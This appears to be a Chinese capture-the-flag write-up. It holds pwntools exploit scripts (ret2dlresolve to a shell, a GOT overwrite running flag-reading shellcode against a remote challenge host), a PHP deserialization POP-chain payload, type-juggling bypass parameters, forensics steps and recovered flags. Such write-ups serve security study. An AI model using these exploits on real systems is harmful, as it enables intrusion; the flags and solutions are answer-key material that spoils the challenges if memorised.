PWN
PWN no_output
利用strcpy函数’\x00’中止的特性修改read函数从标准输入中读入
通过c中最小负数与-1相除触发signal函数中的栈溢出函数
利用ret2dlresolve获得flag
exp:
from pwn import *
from roputils import *
import time
# Build the ROP helper (roputils) from the local binary and start the target.
rop = ROP('./test')
r = process('./test')
# .bss is the scratch area where the second-stage data (the '/bin/sh' string
# and the forged dl-resolve structures) is staged.
bss_base = rop.section('.bss')
context.log_level='debug'
# The sends below answer the program's prompts in order; no recvuntil() is
# used, so each sleep(1) is what keeps a send from racing the previous one.
r.send(p32(0))
sleep(1)
r.send("a"*32)
sleep(1)
r.send('hello_boy')
sleep(1)
# INT_MIN divided by -1 (the write-up's trigger for the signal handler that
# contains the overflowable read); values are sent as decimal strings.
r.send(str(int(-2147483648)))
sleep(1)
r.send(str(int(-1)))
sleep(1)
# Stage 1: 77 bytes of filler (presumably the distance to the saved return
# address — confirm against the binary), then read(0, bss_base, 100) to pull
# in stage 2, then a resolver call that uses the data staged at bss_base + 20.
buf = rop.fill(77)
buf += rop.call('read', 0, bss_base, 100)
buf += rop.dl_resolve_call(bss_base + 20, bss_base)
r.send(buf)
# Stage 2: '/bin/sh' at bss_base, padded to offset 20, followed by the forged
# dynamic-linker records that make the resolver bind 'system'; padded to the
# 100 bytes the read() above expects.
# NOTE(review): ret2dlresolve depends on lazy binding being enabled (partial
# RELRO); confirm the target's protections before relying on this.
buf = rop.string('/bin/sh')
buf += rop.fill(20, buf)
buf += rop.dl_resolve_data(bss_base + 20, 'system')
buf += rop.fill(100, buf)
r.send(buf)
r.interactive()
PWN orw
from pwn import *
沙盒,利用add函数覆盖exit函数的got表中的地址为shellcode,再次执行exit函数打印flag值
exp:
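#p=process('./pwn')
p = remote("39.105.131.68","12354")
elf=ELF('./pwn')
context(os='linux',arch='amd64')
# open/read/write shellcode: per the write-up the target is sandboxed, so the
# payload reads /flag and writes it to stdout instead of spawning a shell.
shellcode = shellcraft.open('/flag')
shellcode += shellcraft.read('rax','rsp',100)
shellcode += shellcraft.write(1,'rsp',100)
p.recv()
p.sendline('1')
p.recvuntil('index:')
# Negative index into the "add" handler: per the write-up this lands on exit's
# GOT entry, so the next exit() call runs the shellcode. The value -13 is
# presumably derived from the binary's layout — confirm if reusing.
# NOTE(review): a binary built with full RELRO has a read-only GOT, which
# would stop this overwrite.
p.sendline('-13')
p.recvuntil('size:')
p.sendline('0')
p.recvuntil('content:')
# Fixed: the original line read "asm(s## 标题hellcode)" — a markdown heading
# fused into the identifier during extraction, leaving an unclosed call.
p.sendline(asm(shellcode))
# Menu option 5 presumably triggers exit(); confirm against the challenge menu.
p.sendline('5')
p.interactive()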
Web
Web 赌徒
御剑扫目录得到www.zip,得到index.php进行代码审计
构造pop链
<?php
class Start
{
    // These values are what serialize() emits; the payload depends on the
    // property names, visibility and declaration order, so keep them as-is.
    public $name='guest';
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';
    // Replace $name with an Info object so that echoing it below goes through
    // Info::__toString() instead of printing a string.
    public function __construct()
    {
        $this->name=new Info();
    }
    // echo on an object calls its __toString(); this is the link to Info.
    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }
    // Chain entry point: PHP runs __wakeup() automatically when the object is
    // unserialize()d, which is why unserialize() on user-controlled input is
    // the root cause here.
    public function __wakeup(){
        echo "hi";
        $this->_sayhello();
    }
    // Handler for reads of undeclared properties; as far as this listing
    // shows, the chain above never reaches it (it goes through Info/Room).
    public function __get($cc){
        echo "give you flag : ".$this->flag;
        return ;
    }
}
class Info
{
    // A private property serializes with a "\0Info\0phonenumber" key; the NUL
    // bytes are why the final payload has to be urlencode()d.
    private $phonenumber=123123;
    public $promise='I do';
    // $file is created dynamically; its 'filename' entry is the Room object
    // that __toString() dereferences.
    public function __construct(){
        $this->file['filename']=new Room();
    }
    // Reading a property Room does not declare (ffiillee) triggers Room::__get().
    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}
class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';
    // $a is set to the object itself (a self-reference in the serialized
    // form) so that __get() below calls $this(), i.e. __invoke().
    public function __construct()
    {
        $this->a=$this;
    }
    // Reached for undeclared-property reads; calling an object as a function
    // dispatches to its __invoke().
    public function __get($name){
        $function = $this->a;
        return $function();
    }
    // Get_hint() is not defined in this listing — presumably it is provided
    // by the target's own class and reads $filename; its output is what the
    // chain leaks.
    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}
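// Build the payload: serialize() the object graph, then urlencode() it so the
// NUL bytes from the private property survive a query string.
// Fixed: the original line had an unbalanced ")" after new Start().
$a = serialize(new Start());
$b = urlencode($a);
echo $b;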
?>
当用get方法传一个pop参数后,会自动调用Show类的__wakeup()魔术方法。new Info 当name对象被当作一个字符串被调用时,触发__toString()方法;$this->file['filename']=new Room(); 到Room类中,没有ffiillee['ffiilleennaammee']属性,触发__get()方法;__get()方法中将$this->a当做函数调用,触发Room的__invoke()方法;
执行__invoke()中的Get_hint。由于属性有private,如果直接echo $a 会有一些字符无法打印,因此需要urlencode一下得到:
O%3A5%3A%22Start%22%3A2%3A%7Bs%3A4%3A%22name%22%3BO%3A4%3A%22Info%22%3A3%3A%7Bs%3A17%3A%22%00Info%00phonenumber%22%3Bi%3A123123%3Bs%3A7%3A%22promise%22%3Bs%3A4%3A%22I+do%22%3Bs%3A4%3A%22file%22%3Ba%3A1%3A%7Bs%3A8%3A%22filename%22%3BO%3A4%3A%22Room%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A5%3A%22%2Fflag%22%3Bs%3A10%3A%22sth_to_set%22%3BN%3Bs%3A1%3A%22a%22%3Br%3A6%3B%7D%7D%7Ds%3A4%3A%22flag%22%3Bs%3A33%3A%22syst3m%28%22cat+127.0.0.1%2Fetc%2Fhint%22%29%3B%22%3B%7D
传参得到base64编码,解出flag
ZmxhZ3s3NDM2ZjA5ZC1iODcwLTRmMTktYTMyNC1hODY2Nzk3NjZiZGN9
Web 寻宝
key1
第一层:要求不能纯数字,$num1=1234a即可
第二层:利用科学计数法绕过 num2 = 5e6
第三层:要求num3的前七位md5=4bf21cd
第四层:科学计数法绕过
第五层:json字符串为空
post传参得到flag
ppp[number1]=1234a&ppp[number2]=5e6&ppp[number3]=61823470&ppp[number4]=0e00000&ppp[number5]=1[]
key2
得到文件夹中都是word文档,于是用脚本将文档内容全部提取出来
import os
import docx
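# Walk five_month\5.<i>\VR_<j>\ for i, j in 1..20, and append the text of
# every non-.png file (read as a Word document) to a.txt, one paragraph per line.
path = "C:\\Users\\de'l'l\\Desktop\\five_month\\"
path_1 = "5."
path_2 = "VR_"
# Open the output once rather than once per paragraph. Append mode keeps the
# original accumulate-across-runs behaviour; an explicit encoding avoids a
# UnicodeEncodeError on characters outside the platform default.
with open("a.txt", "a", encoding="utf-8") as f:
    for i in range(1, 21):
        for j in range(1, 21):
            fileName = path + path_1 + str(i) + "\\" + path_2 + str(j) + "\\"
            # Filter into a new list instead of remove()-ing from the list
            # being iterated, which skipped the entry after every removed .png.
            logFiles = [
                name for name in os.listdir(fileName)
                if name.split('.')[-1] != "png"
            ]
            for k in logFiles:
                fullFilesDir = fileName + k
                file_content = docx.Document(fullFilesDir)
                for p in file_content.paragraphs:
                    f.write(p.text)
                    f.write('\n')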
Misc
Blueteaming
volatility -f /home/kali/桌面/memory.dmp imageinfo
题目描述:Powershell 脚本由恶意程序执行。包含 power shellscript 内容的注册表项是什么?(而且flag非正常格式)
volatility -f /home/kali/桌面/memory.dmp --profile=Win7SP1x64 dumpregistry --dump-dir=
直到看到:
在Microsoft\Windows\Communication中发现
发现这个恶意命令,以为是flag就交上了, 结果不对
试了试注册表目录不对,然后加上注册表的头,提交成功,
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Communication
EzTime
压缩包解压后得到两个文件,根据提示:找到一个时间属性被程序修改过的文件
$MET用010打开后,发现有关于时间的内容
对比观察两个文件的creationtime内容,发现都一样,继续看时间,发现有不一样的地方
因为flag为非正常格式,提交png格式,{45EF6FFC-F0B6-4000-A7C0-8D1549355A8C}.png
ISO1995
用UltraISO打开文件,发现flag开头的文件名,全部提取出来
发现每个文件放入010中能发现ffff后的两字节内容不一样,全部提取出来
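data = '''
...
'''.replace('\n', '').replace(' ', '')


def _words_after_marker(hexdata, marker='F' * 8, width=4):
    """Return the concatenation of the ``width`` hex digits that follow each
    occurrence of ``marker`` in ``hexdata``.

    ``hexdata`` is the hex dump with newlines and spaces stripped; ``marker``
    is the 8-F run that precedes each differing word in the ISO entries.
    Assumes markers and words are byte-aligned and do not overlap.
    """
    words = []
    pos = hexdata.find(marker)
    while pos != -1:
        start = pos + len(marker)
        words.append(hexdata[start:start + width])
        # Resume after the extracted word. The original resumed inside the
        # marker (pos + 4), so a word of 'FFFF' — or a word ending in F's
        # followed by the next marker — was mistaken for a marker start.
        pos = hexdata.find(marker, start + width)
    return ''.join(words)


result1 = _words_after_marker(data)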
提取出来以后按照每四个一组转为10进制,在联想到前面iso中的那些flag开头的文件,只要按照上面的顺序将那些flag文件中的内容对应打印出来即可
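# Each 4-hex-digit word in result1 is an index; the matching flag_fNNNNN file
# (index zero-padded to five digits) holds the next piece of the text.
result2 = ''
for i in range(0, len(result1), 4):
    num = int(result1[i:i + 4], 16)
    with open('flag_f' + str(num).rjust(5, '0')) as f:
        result2 += f.read()
num = result2.find("FLAG")
# Print from the marker onward. When it is absent, print everything instead of
# result2[-1:] — the single last character that find()'s -1 would select.
print(result2[num:] if num != -1 else result2)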